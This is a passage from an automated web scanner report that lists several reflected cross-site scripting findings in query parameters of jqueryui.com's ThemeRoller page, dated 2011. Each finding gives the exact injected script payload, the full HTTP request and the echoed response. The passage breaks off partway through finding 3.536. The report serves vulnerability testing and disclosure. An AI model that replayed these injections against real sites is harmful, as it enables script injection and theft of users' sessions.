The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dc1"><script>alert(1)</script>9cc354f2545 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png88dc1"><script>alert(1)</script>9cc354f2545&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png88dc1"><script>alert(1)</script>9cc354f2545&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

3.528. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba767"><script>alert(1)</script>03801eccdd0 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngba767"><script>alert(1)</script>03801eccdd0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngba767"><script>alert(1)</script>03801eccdd0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.529. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccc3"><script>alert(1)</script>e86fd8486e8 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png5ccc3"><script>alert(1)</script>e86fd8486e8&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png5ccc3"><script>alert(1)</script>e86fd8486e8&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.530. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ac1"><script>alert(1)</script>9210ea66bdf was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png84ac1"><script>alert(1)</script>9210ea66bdf&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png84ac1"><script>alert(1)</script>9210ea66bdf&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.531. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6f9"><script>alert(1)</script>abe1a9372d2 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pngaf6f9"><script>alert(1)</script>abe1a9372d2&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pngaf6f9"><script>alert(1)</script>abe1a9372d2&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

3.532. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903d0"><script>alert(1)</script>89f58c5876 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa903d0"><script>alert(1)</script>89f58c5876&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa903d0"><script>alert(1)</script>89f58c5876&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.533. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1346"><script>alert(1)</script>16a6bea7164 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c1346"><script>alert(1)</script>16a6bea7164&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c1346"><script>alert(1)</script>16a6bea7164&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

3.534. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d68b"><script>alert(1)</script>0e99ffd0389 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa2d68b"><script>alert(1)</script>0e99ffd0389&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa2d68b"><script>alert(1)</script>0e99ffd0389&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.535. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfb0"><script>alert(1)</script>e226ef94aa6 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999acfb0"><script>alert(1)</script>e226ef94aa6&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999acfb0"><script>alert(1)</script>e226ef94aa6&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

3.536. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f528"><script>alert(1)</script>f39ca9e48a0 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

